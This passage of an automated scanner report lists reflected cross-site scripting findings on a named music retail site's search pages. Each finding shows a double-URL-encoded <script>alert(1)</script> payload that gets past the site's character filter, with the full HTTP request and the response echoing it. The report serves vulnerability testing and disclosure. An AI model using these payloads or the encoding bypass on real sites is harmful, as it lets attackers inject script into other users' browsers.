The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload c5c92%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea1701caffcf was submitted in the REST URL parameter 3. This input was echoed as c5c92</title><script>alert(1)</script>a1701caffcf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Captain%20Ahabc5c92%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea1701caffcf&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:56 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=mnbdd2o6b95kokdolrfsdokg05; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:56 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=310552625; expires=Sun, 09-Jan-2011 02:39:56 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=132639303; expires=Sun, 09-Jan-2011 02:39:56 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Captain Ahabc5c92</title><script>alert(1)</script>a1701caffcf</title>
...[SNIP]...

1.92. http://www.insound.com/search/query/Captain%20Ahab&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Captain%20Ahab&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca4e1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea7b6950ca20 was submitted in the REST URL parameter 3. This input was echoed as ca4e1"><script>alert(1)</script>a7b6950ca20 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Captain%20Ahabca4e1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea7b6950ca20&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:48 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=3cs4b0e1ionlkm9f6j94sh6sc7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:48 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=369877812; expires=Sun, 09-Jan-2011 02:39:48 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=303795982; expires=Sun, 09-Jan-2011 02:39:48 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38025

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Captain Ahabca4e1"><script>alert(1)</script>a7b6950ca20" />
...[SNIP]...

1.93. http://www.insound.com/search/query/Captain%20Beefheart%20and%20His%20Magic%20Band&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Captain%20Beefheart%20and%20His%20Magic%20Band&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d121%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e542a231f10c was submitted in the REST URL parameter 3. This input was echoed as 6d121"><script>alert(1)</script>542a231f10c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Captain%20Beefheart%20and%20His%20Magic%20Band6d121%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e542a231f10c&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=aeqnuo4t5mmognu4qj2m7483m3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:52 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=252191286; expires=Sun, 09-Jan-2011 02:39:52 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=532678477; expires=Sun, 09-Jan-2011 02:39:52 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40436

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Captain Beefheart and His Magic Band6d121"><script>alert(1)</script>542a231f10c" />
...[SNIP]...

1.94. http://www.insound.com/search/query/Captain%20Beefheart%20and%20His%20Magic%20Band&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Captain%20Beefheart%20and%20His%20Magic%20Band&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 1236d%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb81f655e02b was submitted in the REST URL parameter 3. This input was echoed as 1236d</title><script>alert(1)</script>b81f655e02b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Captain%20Beefheart%20and%20His%20Magic%20Band1236d%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb81f655e02b&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:02 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=3gns4cjijs0ovg1fv81lvfssv6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:02 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=513736123; expires=Sun, 09-Jan-2011 02:40:02 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=528181852; expires=Sun, 09-Jan-2011 02:40:02 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40516

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Captain Beefheart and His Magic Band1236d</title><script>alert(1)</script>b81f655e02b</title>
...[SNIP]...

1.95. http://www.insound.com/search/query/Captain%20Beefheart&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Captain%20Beefheart&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28100%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e13be6574f33 was submitted in the REST URL parameter 3. This input was echoed as 28100"><script>alert(1)</script>13be6574f33 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Captain%20Beefheart28100%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e13be6574f33&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:54 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=2a1oqpeum4packl24hdonsvtd4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:54 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=247094540; expires=Sun, 09-Jan-2011 02:39:54 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=240772428; expires=Sun, 09-Jan-2011 02:39:54 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38080

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Captain Beefheart28100"><script>alert(1)</script>13be6574f33" />
...[SNIP]...

1.96. http://www.insound.com/search/query/Captain%20Beefheart&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Captain%20Beefheart&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload d3d32%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6b225887cc2 was submitted in the REST URL parameter 3. This input was echoed as d3d32</title><script>alert(1)</script>6b225887cc2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Captain%20Beefheartd3d32%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6b225887cc2&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:01 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=43onokf0u6ql6sjudsh2ulacd4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:01 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=110835097; expires=Sun, 09-Jan-2011 02:40:01 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=229857763; expires=Sun, 09-Jan-2011 02:40:01 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38160

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Captain Beefheartd3d32</title><script>alert(1)</script>6b225887cc2</title>
...[SNIP]...

1.97. http://www.insound.com/search/query/Captain%20Onboard&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Captain%20Onboard&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4888a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea84d697d9ca was submitted in the REST URL parameter 3. This input was echoed as 4888a"><script>alert(1)</script>a84d697d9ca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Captain%20Onboard4888a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea84d697d9ca&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:50 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=temmqj0mmp4c4afn4bsbu3vub3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:50 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=266814025; expires=Sun, 09-Jan-2011 02:39:50 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=505372686; expires=Sun, 09-Jan-2011 02:39:50 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38058

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Captain Onboard4888a"><script>alert(1)</script>a84d697d9ca" />
...[SNIP]...

1.98. http://www.insound.com/search/query/Captain%20Onboard&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Captain%20Onboard&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 867ed%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e06989965620 was submitted in the REST URL parameter 3. This input was echoed as 867ed</title><script>alert(1)</script>06989965620 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Captain%20Onboard867ed%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e06989965620&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:58 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=vv8643nlla69p0ips65ih02702; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:58 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=61075873; expires=Sun, 09-Jan-2011 02:39:58 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=530594327; expires=Sun, 09-Jan-2011 02:39:58 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38138

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Captain Onboard867ed</title><script>alert(1)</script>06989965620</title>
...[SNIP]...

1.99. http://www.insound.com/search/query/Carabina%2030%2030&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Carabina%2030%2030&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88245%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef3d995ee735 was submitted in the REST URL parameter 3. This input was echoed as 88245"><script>alert(1)</script>f3d995ee735 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Carabina%2030%203088245%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef3d995ee735&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:49 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=k8ibl292745ltv8pa67c8kgtl5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:49 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=164567339; expires=Sun, 09-Jan-2011 02:39:49 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=98443255; expires=Sun, 09-Jan-2011 02:39:49 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Carabina 30 3088245"><script>alert(1)</script>f3d995ee735" />
...[SNIP]...

1.100. http://www.insound.com/search/query/Carabina%2030%2030&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Carabina%2030%2030&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload e439f%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3a8015ddcdf was submitted in the REST URL parameter 3. This input was echoed as e439f</title><script>alert(1)</script>3a8015ddcdf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Carabina%2030%2030e439f%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3a8015ddcdf&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:56 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=l2i83bmohpa3vv8uqsdvoi7bi3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:56 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=239741202; expires=Sun, 09-Jan-2011 02:39:56 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=453952994; expires=Sun, 09-Jan-2011 02:39:56 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37296

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Carabina 30 30e439f</title><script>alert(1)</script>3a8015ddcdf</title>
...[SNIP]...

1.101. http://www.insound.com/search/query/Caralee%20McElroy&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Caralee%20McElroy&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 4ef72%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e65012859d80 was submitted in the REST URL parameter 3. This input was echoed as 4ef72</title><script>alert(1)</script>65012859d80 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Caralee%20McElroy4ef72%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e65012859d80&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:01 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=k6g4r6u8jirorgs3lpjn0qltc6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:01 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=551357029; expires=Sun, 09-Jan-2011 02:40:01 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=202431491; expires=Sun, 09-Jan-2011 02:40:01 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19033

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Caralee McElroy4ef72</title><script>alert(1)</script>65012859d80</title>
...[SNIP]...

1.102. http://www.insound.com/search/query/Caralee%20McElroy&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Caralee%20McElroy&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88d30%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed2ece26075f was submitted in the REST URL parameter 3. This input was echoed as 88d30"><script>alert(1)</script>d2ece26075f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Caralee%20McElroy88d30%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed2ece26075f&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:54 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=obges1170a2me9vudfm9i30mq3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:54 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=276600965; expires=Sun, 09-Jan-2011 02:39:54 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=326174043; expires=Sun, 09-Jan-2011 02:39:54 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19017

